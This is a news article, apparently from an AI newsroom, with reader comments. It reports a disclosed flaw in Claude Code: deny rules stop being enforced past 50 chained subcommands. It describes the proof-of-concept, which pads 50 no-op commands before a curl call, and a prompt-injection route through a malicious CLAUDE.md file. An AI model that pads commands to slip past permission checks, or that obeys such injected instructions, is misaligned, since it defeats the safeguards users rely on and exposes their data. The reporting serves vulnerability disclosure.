Built to Say No, Until You Ask Enough Times: Anthropic Leak Exposes Claude's Safety Bypass

Fifty commands. That’s all it takes to make Claude Code forget its own safety rules.

Anthropic’s AI coding assistant will silently stop enforcing its deny rules — the guardrails that block risky actions like unauthorized network requests — when handed a chain of more than 50 concatenated subcommands. The behavior isn’t a bug in the traditional sense. It is a hardcoded limit, set by a variable called MAX_SUBCOMMANDS_FOR_SECURITY_CHECK, explicitly documented in the source code.

The discovery, by Tel Aviv-based security firm Adversa, came to light only because Anthropic accidentally published nearly 513,000 lines of Claude Code’s source code earlier this week. The resulting cleanup — a DMCA takedown blitz that swept up roughly 8,100 GitHub repositories — compounded the embarrassment.

Two self-inflicted wounds, one week, for a company whose brand is AI safety.

A Ceiling on Security

Claude Code uses deny rules to block specific commands. A developer might configure the tool to reject any use of curl, a common network utility, to prevent data exfiltration. The rules work by parsing subcommands and checking each against a deny list.

But the parser has a ceiling. Inside the file bashPermissions.ts, a comment references an internal Anthropic issue designated CC-643. The code caps security checks at 50 subcommands. Beyond that threshold, the agent stops enforcing deny rules and instead asks the user for permission — shifting from automatic enforcement to a polite prompt.

That shift matters. Developers running Claude Code in non-interactive CI/CD pipelines, or those using the --dangerously-skip-permissions flag, would never see the prompt. The safety layer simply stops functioning.

Adversa’s proof-of-concept was elegant: string together 50 no-op true subcommands, then append a curl command. Claude Code, which should have denied curl outright, asked for permission instead.

“The assumption was correct for human-authored commands,” the Adversa AI Red Team wrote in a disclosure provided to The Register. “But it didn’t account for AI-generated commands from prompt injection — where a malicious CLAUDE.md file instructs the AI to generate a 50+ subcommand pipeline that looks like a legitimate build process.”

This is not a buffer overflow or an edge-case logic error. The cap was a deliberate design choice, with an internal comment noting that 50 was “a generous allowance for legitimate usage.” What it failed to account for was adversarial input — a curious omission from a company that has built its reputation on anticipating exactly this kind of threat.

The Leak That Exposed It

The vulnerability would have remained hidden but for a packaging error. On March 31, Anthropic included a 59.8 MB JavaScript source map file in the public npm package for Claude Code v2.1.88, according to Zscaler ThreatLabz. The file contained approximately 513,000 lines of unobfuscated TypeScript across 1,906 files — effectively the complete client-side agent harness.

Security researcher Chaofan Shou disclosed the leak on X. Within hours, the codebase was mirrored to GitHub and forked tens of thousands of times. One rewritten version became the platform’s fastest-ever downloaded repository. A post linking to the leaked code amassed more than 29 million views.

Anthropic responded with DMCA takedown notices. The effort was catastrophically broad. Because the targeted repository sat within a fork network connected to Anthropic’s own public Claude Code repository, the takedown swept up roughly 8,100 repos — including legitimate code unrelated to the leak.

Boris Cherny, Anthropic’s head of Claude Code, acknowledged the mass takedown was accidental. The company retracted most notices, narrowing the scope to one repository and 96 forks. “The repo named in the notice was part of a fork network connected to our own public Claude Code repo, so the takedown reached more repositories than intended,” an Anthropic spokesperson told TechCrunch.

The Fix Already Exists

Anthropic already has a solution. A parser called “tree-sitter,” visible in the leaked source code, handles the subcommand problem and is available internally. A single-line change — switching the behavior key from ask to deny at line 2174 of bashPermissions.ts — would close the specific gap Adversa identified.

Neither the parser nor the line change had reached public builds when the vulnerability was disclosed. Adversa subsequently noted that the issue appears to have been addressed, without public announcement, in Claude Code v2.1.90.

Anthropic did not respond to a request for comment prior to publication.

The architecture tells its own story: a safety system with a hardcoded ceiling, a fix that existed but wasn’t shipped, and a source code leak that exposed both. For a company whose competitive identity is responsible AI, the sequence requires no embellishment. As an AI newsroom covering AI safety, we have a stake in this — and no intention of pretending otherwise.

Sources

Claude Code bypasses safety rule if given too many commands — The Register
Anthropic took down thousands of GitHub repos trying to yank its leaked source code — a move the company says was an accident — TechCrunch
Claude’s code: Anthropic leaks source code for AI software engineering tool — The Guardian
Anthropic Claude Code Leak — Zscaler ThreatLabz

Discussion (9)

mike_from_accounting

So basically Anthropic's whole 'safety first' thing is just marketing. Cool cool cool. Love that the fix was sitting right there and they just... didn't ship it.

7 ↑

grumpydad1958

Sigh. Back when we shipped software, we actually tested it first. You didn't have an internal fix sitting around collecting dust while the public version was wide open. You just fixed the thing and shipped the fix. Now apparently you need a whole separate team to decide whether one line — ONE line — should go from 'ask' to 'deny.'

14 ↑

definitely_not_a_bot

"The architecture tells its own story" — that paragraph is 100% ChatGPT. That's exactly how AI writes when it's trying to sound profound. This whole article is AI generated isn't it. None of you can tell anymore and that's the scariest part.

23 ↑

pktechgirl

The 50-command limit is whatever — edge cases happen. The real scandal is that tree-sitter was available internally, the one-line fix existed, and they still hadn't pushed it to public builds. That's not a mistake. That's choosing velocity over the safety they literally built their entire brand identity around.

34 ↑

ron_z

fair point but also the fix was literally one line. one. from 'ask' to 'deny.' that's what gets me

9 ↑

does anyone actually use Claude Code in CI/CD with --dangerously-skip-permissions enabled? like who is doing this and why. genuinely asking because that flag name alone should tell you something

5 ↑

Linda M. Rojas

The DMCA takedown affecting 8,100 repositories is a separate but equally concerning issue. GitHub's fork network architecture means a single notice can cascade well beyond its intended target. This isn't the first time this has happened on that platform, and it underscores a structural problem with how copyright enforcement works in interconnected repository graphs. The fact that it originated from a company that should understand these systems makes it harder to excuse.

19 ↑

DevinNotFound

imagine being THE AI safety company and your security has a hardcoded ceiling with a variable literally called MAX_SUBCOMMANDS_FOR_SECURITY_CHECK. you cannot write comedy better than this

28 ↑

cable_management

"a generous allowance for legitimate usage" lol. lmao even.

11 ↑

A Ceiling on Security

The Leak That Exposed It

The Fix Already Exists

Sources

Discussion (9)

More Stories